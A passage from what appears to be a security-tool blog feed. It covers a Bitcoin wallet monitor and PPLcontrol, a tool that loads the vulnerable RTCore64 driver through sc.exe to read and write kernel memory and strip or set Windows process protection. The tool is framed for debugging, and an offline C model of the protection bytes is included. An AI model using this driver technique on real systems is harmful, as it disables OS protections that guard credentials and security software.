title="https://github.com/outflanknl/C2-Tool-Collection">https://github.com/outflanknl/C2-Tool-Collection</a></p> <p dir="auto">dtmsecurity - Beacon Object File (BOF) Creation Helper<br /> <a href="https://github.com/dtmsecurity/bof_helper" rel="nofollow" target="_blank" title="https://github.com/dtmsecurity/bof_helper">https://github.com/dtmsecurity/bof_helper</a></p> <p dir="auto">Microsoft :) <br /> <a href="https://learn.microsoft.com/en-us/windows/win32/api/" rel="nofollow" target="_blank" title="https://learn.microsoft.com/en-us/windows/win32/api/">https://learn.microsoft.com/en-us/windows/win32/api/</a></p> <p dir="auto">HsTechDocs by HelpSystems(Fortra)<br /> <a href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm" rel="nofollow" target="_blank" title="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm">https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mertdas/PrivKit" rel="nofollow" target="_blank" title="Download PrivKit">Download PrivKit</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-24979458926513576462023-07-25T09:14:00.002-04:002023-07-25T09:14:35.317-04:00Wallet-Transaction-Monitor - This Script Monitors A Bitcoin Wallet Address And Notifies The User When There Are Changes In The Balance Or New Transactions<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhuDeLU636d0AjcBrP67ciRyE7X4uNUHsXUhuPHyuNxn-5S1sjYT5n5bp2IRlL-FJMNsINf5XWHpKlcTDBb_tVnLk6Vs354WrDWwz6ufwM0_XSMOGD5vVOMdR1yaU33XijgswR-QWlY8LwA2nXrrZmDotvQGJmfdRg4rGdlLmPYkGfDhhQYrYMTEszR6Wlj"><img alt="" border="0" height="356" 
id="BLOGGER_PHOTO_ID_7257368381575957922" src="https://blogger.googleusercontent.com/img/a/AVvXsEhuDeLU636d0AjcBrP67ciRyE7X4uNUHsXUhuPHyuNxn-5S1sjYT5n5bp2IRlL-FJMNsINf5XWHpKlcTDBb_tVnLk6Vs354WrDWwz6ufwM0_XSMOGD5vVOMdR1yaU33XijgswR-QWlY8LwA2nXrrZmDotvQGJmfdRg4rGdlLmPYkGfDhhQYrYMTEszR6Wlj=w640-h356" width="640" /></a></p><br /> <p dir="auto">This script monitors a <a href="https://www.kitploit.com/search/label/Bitcoin" target="_blank" title="Bitcoin">Bitcoin</a> wallet address and notifies the user when there are changes in the balance or new transactions. It provides <a href="https://www.kitploit.com/search/label/Real-Time" target="_blank" title="real-time">real-time</a> updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> when a new transaction occurs.<span></span></p><a name='more'></a><p></p><blockquote><ul dir="auto"> </ul> </blockquote> <h3 dir="auto" tabindex="-1">Requirements</h3> <p dir="auto">Python 3.x requests library: You can install it by running pip install requests. winsound module: This module is available by default on Windows.</p> <h3 dir="auto" tabindex="-1">How to Run</h3> <ul dir="auto"> <li>Make sure you have Python 3.x installed on your system.</li> <li>pip install -r requirements.txt</li> <li>Clone or download the script file wallet_transaction_monitor.py from this repository.</li> <li>Place the sound file (in .wav format) you want to use for the notification in the same <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> as the script. 
Make sure to replace "soundfile.wav" in the script with the actual filename of your sound file.</li> <li>Open a terminal or command prompt and navigate to the directory where the script is located.</li> </ul> <ul dir="auto"> <li>Run the script by executing the following command:</li> </ul> <div><pre><code>python wallet_transaction_monitor.py</code></pre></div> <p dir="auto">The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.</p> <h3 dir="auto" tabindex="-1">Important Notes</h3> <p dir="auto">This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for <a href="https://www.kitploit.com/search/label/Audio" target="_blank" title="audio">audio</a> notifications. The script uses the Blockchain.info API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. 
It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SomethingTotallyRandom/Wallet-Transaction-Monitor" rel="nofollow" target="_blank" title="Download Wallet-Transaction-Monitor">Download Wallet-Transaction-Monitor</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-60927706730164832742023-07-16T08:30:00.003-04:002023-07-16T08:30:00.134-04:00PPLcontrol - Controlling Windows PP(L)s<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVW_aQlUOUcJ-1hu-Lfmu37YQkP155xR1Ss1FG1cTgwtdJWkqYypXoK-FkNadmmmLxwp83-fyakvI7nOluK-G5gPLUZjUywtcH2NMFA4XKLbzYBZk04C7aZM-aqJfnhkooYR1_pbm35auMGYDfDsvV82Ewov86uYC3V7sfiE_Y9GxpdS7U8SJrExiixtM/s490/h36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="320" data-original-width="490" height="418" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVW_aQlUOUcJ-1hu-Lfmu37YQkP155xR1Ss1FG1cTgwtdJWkqYypXoK-FkNadmmmLxwp83-fyakvI7nOluK-G5gPLUZjUywtcH2NMFA4XKLbzYBZk04C7aZM-aqJfnhkooYR1_pbm35auMGYDfDsvV82Ewov86uYC3V7sfiE_Y9GxpdS7U8SJrExiixtM/w640-h418/h36.png" width="640" /></a></div><p><br /></p> <p dir="auto">This tool allows you to list protected processes, get the protection level of a specific process, or set an arbitrary protection level. For more information, you can read this blog post: <a href="https://itm4n.github.io/debugging-protected-processes/" rel="nofollow" target="_blank" title="Debugging Protected Processes">Debugging Protected Processes</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Usage</h2> <h3 dir="auto" tabindex="-1">1. 
Download the MSI driver</h3> <p dir="auto">PPLcontrol reaches kernel memory through <code>RTCore64.sys</code>, the signed MSI Afterburner driver, which hands arbitrary kernel memory reads and writes to any user-mode code that can open its device object. You can get a copy here: <a href="https://github.com/RedCursorSecurityConsulting/PPLKiller/tree/master/driver" rel="nofollow" target="_blank" title="PPLKiller/driver">PPLKiller/driver</a>.</p> <h3 dir="auto" tabindex="-1">2. Install the MSI driver</h3> <p dir="auto"><strong>Disclaimer:</strong> it goes without saying that you should never install this driver on your host machine; while it is loaded, anything running on the box has a kernel read/write primitive. <strong>Use a VM!</strong></p> <p dir="auto">Run the following from an elevated prompt. The space after each <code>=</code> is required by the <code>sc.exe</code> argument parser. <code>start= demand</code> also works if you would rather the driver not load on every boot of the VM; <code>net start</code> loads it either way.</p> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" dir="auto"><pre><code>sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner"<br />net start RTCore64</code></pre></div> <h3 dir="auto" tabindex="-1">3. Use PPLcontrol</h3> <p dir="auto">List protected processes.</p> <div><pre><code>PPLcontrol.exe list</code></pre></div> <p dir="auto">Get the protection level of a specific process.</p> <div><pre><code>PPLcontrol.exe get 1234</code></pre></div> <p dir="auto">Set an arbitrary protection level. The level is a type, <code>PP</code> (protected) or <code>PPL</code> (protected light), followed by a signer name; the signer names are those of the kernel's <code>PS_PROTECTED_SIGNER</code> enumeration (Authenticode, CodeGen, Antimalware, Lsa, Windows, WinTcb, WinSystem, App). <code>set</code> rewrites the protection level only and leaves the signature levels untouched, so use it on a process that is already protected.</p> <div><pre><code>PPLcontrol.exe set 1234 PPL WinTcb</code></pre></div> <p dir="auto">Protect a non-protected process with an arbitrary protection level. Unlike <code>set</code>, this also adjusts the EXE and DLL signature levels to match the chosen signer, which a process that was never protected does not have.</p> <div><pre><code>PPLcontrol.exe protect 1234 PPL WinTcb</code></pre></div> <p dir="auto">Unprotect a protected process. This sets the protection level to <code>0</code> (<em>i.e.</em> <code>None</code>) and the EXE/DLL signature levels to <code>0</code> (<em>i.e.</em> <code>Unchecked</code>).</p> <div><pre><code>PPLcontrol.exe unprotect 1234</code></pre></div> <h3 dir="auto" tabindex="-1">4. 
Uninstall the driver</h3> <p dir="auto">Stop and delete the service as soon as you are done, so the kernel read/write primitive does not stay resident in the VM:</p> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" dir="auto"><pre><code>net stop RTCore64<br />sc.exe delete RTCore64</code></pre></div> <h2 dir="auto" tabindex="-1">Use cases</h2> <h3 dir="auto" tabindex="-1">Debugging a protected process with WinDbg</h3> <p dir="auto">WinDbg only needs to open the target process, and a process may open a protected process only if its own protection dominates the target's. So instead of lowering the target's protection, you can use PPLcontrol to raise the protection level of your <code>windbg.exe</code> process.</p> <ol dir="auto"> <li>Get the PID of the <code>windbg.exe</code> process.</li> <li>Use PPLcontrol to set an arbitrary protection level on it (<code>protect</code> rather than <code>set</code>, since windbg.exe starts out unprotected).</li> </ol> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" dir="auto"><pre><code>C:\Temp>tasklist | findstr /i windbg<br />windbg.exe 1232 Console 1 24,840 K<br />C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb<br />[+] The Protection 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'.<br />[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232.</code></pre></div> <p dir="auto">Two caveats. A PPL cannot open a PP (fully protected) process, so for a PP target protect windbg.exe with <code>PP WinTcb</code> instead. And once windbg.exe is protected, the section signature level set alongside the protection applies to every DLL it loads from then on, so unsigned extensions will likely fail to load in the same way as described in the next use case; load them before protecting the process, and run <code>PPLcontrol.exe unprotect</code> on windbg.exe when you are done.</p> <h3 dir="auto" tabindex="-1">Inspecting a protected process with API Monitor</h3> <p dir="auto">In addition to opening the target process, API Monitor injects a DLL into it. 
Therefore, setting an arbitrary protection level on your <code>apimonitor.exe</code> process won't suffice. The injected DLL is not signed at the level a protected process requires, so the target's section signature level (which <code>protect</code> sets together with the protection level, as its output shows) will likely prevent it from being loaded, and API Monitor reports error 577 (<code>ERROR_INVALID_IMAGE_HASH</code>):</p> <div><pre><code>Failed to load module in target process - Error: 577, Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.</code></pre></div> <p dir="auto">The workaround is to temporarily remove the protection from the target, start monitoring it (which is when the DLL gets injected), and restore the protection right after. Note the level reported by <code>get</code> before unprotecting so that you put back the same one, and keep the window short: between steps 3 and 5 the target is an ordinary process that any sufficiently privileged process can open.</p> <ol dir="auto"> <li>Get the PID of the target process.</li> <li>Use PPLcontrol to get the protection level of the target process.</li> <li>Unprotect the process.</li> <li>Start monitoring the process with API Monitor.</li> <li>Restore the protection of the target process.</li> </ol> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" 
dir="auto"><pre><code>C:\Temp>tasklist | findstr /i target<br />target.exe 1337 Services 1 14,160 K<br />C:\Temp>PPLcontrol.exe get 1337<br />[+] The process with PID 1337 is a PPL with the Signer type 'WinTcb' (6).<br />C:\Temp>PPLcontrol.exe unprotect 1337<br />[+] The process with PID 1337 is no longer a PP(L).<br /><br />C:\Temp>PPLcontrol.exe protect 1337 PPL WinTcb<br />[+] The Protection 'PPL-WinTcb' was set on the process with PID 1337, previous protection was: 'None-None'.<br />[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1337.</code></pre></div> <p dir="auto">The "(6)" after the signer name is its index in the <code>PS_PROTECTED_SIGNER</code> enumeration (None=0, Authenticode=1, CodeGen=2, Antimalware=3, Lsa=4, Windows=5, WinTcb=6, WinSystem=7, App=8); the restore step passes back the same <code>PPL</code> type and <code>WinTcb</code> signer that <code>get</code> reported.</p> <h2 dir="auto" tabindex="-1">Build</h2> <ol dir="auto"> <li>Open the solution in Visual Studio.</li> <li>Select <code>Release/x64</code> (<code>x86</code> is not supported and will probably never be).</li> <li>Build the solution.</li> </ol> <h2 dir="auto" tabindex="-1">Credit</h2> <ul dir="auto"> <li><a href="https://twitter.com/aceb0nd" rel="nofollow" target="_blank" title="@aceb0nd">@aceb0nd</a> for the tool <a href="https://github.com/RedCursorSecurityConsulting/PPLKiller" rel="nofollow" target="_blank" title="PPLKiller">PPLKiller</a></li> <li><a href="https://twitter.com/aionescu" rel="nofollow" target="_blank" title="@aionescu">@aionescu</a> for the article <a href="https://www.alex-ionescu.com/?p=146" rel="nofollow" target="_blank" title="Protected Processes Part 3: Windows PKI Internals (Signing Levels, Scenarios, Root Keys, EKUs & Runtime Signers)">Protected Processes Part 3: Windows PKI Internals (Signing Levels, Scenarios, Root Keys, EKUs &amp; Runtime Signers)</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/itm4n/PPLcontrol" rel="nofollow" target="_blank" title="Download PPLcontrol">Download PPLcontrol</a></span></b></div>
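<p dir="auto">What <code>get</code>, <code>set</code>, <code>protect</code> and <code>unprotect</code> in the Usage section actually change is three bytes of the target's <code>_EPROCESS</code>, and the API Monitor sequence above is a save, clear and restore of those bytes. The following C program is an added example, not PPLcontrol's own code: it models those three fields in a plain struct (no driver involved), using the <code>PS_PROTECTED_TYPE</code>, <code>PS_PROTECTED_SIGNER</code> and <code>SE_SIGNING_LEVEL_*</code> values from ntddk.h and winnt.h, so that raw values seen in WinDbg (<code>dt nt!_EPROCESS Protection</code>) can be converted to and from the names PPLcontrol prints, and so that the restore step can be checked to bring a target back to its original state. It assumes the <code>_PS_PROTECTION</code> bit layout (Type in bits 0-2, Audit in bit 3, Signer in bits 4-7) and maps signature levels only for the WinTcb case this page documents; the struct and function names (<code>eprocess_prot_t</code>, <code>ppl_protect</code>, <code>api_monitor_sequence</code>) are this example's own.</p>

```c
/* Added example, not part of PPLcontrol: a user-mode model of the three
 * _EPROCESS fields the tool rewrites through the driver (Protection,
 * SignatureLevel, SectionSignatureLevel), using the enum values from
 * ntddk.h / winnt.h. No driver is touched; the struct stands in for the
 * EPROCESS bytes so the encoding and the get/unprotect/protect sequence
 * can be checked offline.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* PS_PROTECTED_TYPE (ntddk.h): low 3 bits of _PS_PROTECTION.Level */
enum ps_protected_type {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,   /* printed as "PPL" */
    PsProtectedTypeProtected = 2         /* printed as "PP"  */
};

/* PS_PROTECTED_SIGNER (ntddk.h): high 4 bits of _PS_PROTECTION.Level */
enum ps_protected_signer {
    PsProtectedSignerNone = 0, PsProtectedSignerAuthenticode, PsProtectedSignerCodeGen,
    PsProtectedSignerAntimalware, PsProtectedSignerLsa, PsProtectedSignerWindows,
    PsProtectedSignerWinTcb, PsProtectedSignerWinSystem, PsProtectedSignerApp
};

/* SE_SIGNING_LEVEL_* (winnt.h): only the three values this page's output shows */
enum { SE_SIGNING_LEVEL_UNCHECKED = 0, SE_SIGNING_LEVEL_WINDOWS = 12, SE_SIGNING_LEVEL_WINDOWS_TCB = 14 };

/* Stand-in for the EPROCESS fields PPLcontrol patches (assumed layout, see lead-in). */
typedef struct {
    uint8_t protection;              /* _EPROCESS.Protection.Level: Type:3, Audit:1, Signer:4 */
    uint8_t signature_level;         /* _EPROCESS.SignatureLevel */
    uint8_t section_signature_level; /* _EPROCESS.SectionSignatureLevel */
} eprocess_prot_t;

uint8_t ps_protection_level(unsigned type, unsigned signer) {
    return (uint8_t)((type & 0x7u) | ((signer & 0xFu) << 4));
}
unsigned ps_protection_type(uint8_t level)   { return level & 0x7u; }
unsigned ps_protection_signer(uint8_t level) { return (level >> 4) & 0xFu; }

static const char *type_name(unsigned t) {
    static const char *names[] = { "None", "PPL", "PP" };
    return t < 3 ? names[t] : "?";
}
static const char *signer_name(unsigned s) {
    static const char *names[] = { "None", "Authenticode", "CodeGen", "Antimalware",
                                   "Lsa", "Windows", "WinTcb", "WinSystem", "App" };
    return s < 9 ? names[s] : "?";
}

/* Render a Level byte the way PPLcontrol prints it: "PPL-WinTcb", "None-None", ... */
const char *describe_protection(uint8_t level) {
    static char buf[32];
    snprintf(buf, sizeof buf, "%s-%s", type_name(ps_protection_type(level)),
             signer_name(ps_protection_signer(level)));
    return buf;
}

/* "set": rewrite the protection byte only; the signature levels are left alone. */
void ppl_set(eprocess_prot_t *p, unsigned type, unsigned signer) {
    p->protection = ps_protection_level(type, signer);
}

/* "protect": protection byte plus signature levels. The page documents the
 * levels only for WinTcb (WindowsTcb / Windows); any other signer returns -1
 * here rather than guessing a mapping. */
int ppl_protect(eprocess_prot_t *p, unsigned type, unsigned signer) {
    if (signer != PsProtectedSignerWinTcb) return -1;
    ppl_set(p, type, signer);
    p->signature_level = SE_SIGNING_LEVEL_WINDOWS_TCB;
    p->section_signature_level = SE_SIGNING_LEVEL_WINDOWS;
    return 0;
}

/* "unprotect": protection None-None and both signature levels Unchecked (0). */
void ppl_unprotect(eprocess_prot_t *p) {
    p->protection = p->signature_level = p->section_signature_level = 0;
}

/* The API Monitor sequence: get, unprotect, (inject), protect again with the
 * type and signer that get reported. Returns 1 if the target ends up exactly
 * as it started, 0 otherwise. */
int api_monitor_sequence(eprocess_prot_t *target) {
    eprocess_prot_t saved = *target;                 /* step 2: get */
    ppl_unprotect(target);                           /* step 3: unprotect */
    int was_open = target->protection == 0;          /* step 4: the DLL can be injected now */
    if (ppl_protect(target, ps_protection_type(saved.protection),
                    ps_protection_signer(saved.protection)) != 0)   /* step 5: restore */
        return 0;
    return was_open && target->protection == saved.protection &&
           target->signature_level == saved.signature_level &&
           target->section_signature_level == saved.section_signature_level;
}

int main(void) {
    /* constructed input: a PPL-WinTcb process as get reported it above (0x61, 14, 12) */
    eprocess_prot_t target = { 0x61, SE_SIGNING_LEVEL_WINDOWS_TCB, SE_SIGNING_LEVEL_WINDOWS };
    printf("0x%02x = %s\n", target.protection, describe_protection(target.protection));
    printf("restored exactly: %d\n", api_monitor_sequence(&target));
    return 0;
}
```

<p dir="auto">The round trip succeeds here because the sample target started with exactly the signature levels that <code>protect</code> assigns for WinTcb. That is the practical caveat the model makes visible: <code>protect</code> restores the type and signer you pass it, but the signature levels become whatever the tool assigns for that signer, and <code>get</code> does not print them. If a byte-exact restore matters for what you are debugging, read <code>SignatureLevel</code> and <code>SectionSignatureLevel</code> from the target's <code>_EPROCESS</code> in WinDbg before step 3 and compare them after step 5.</p>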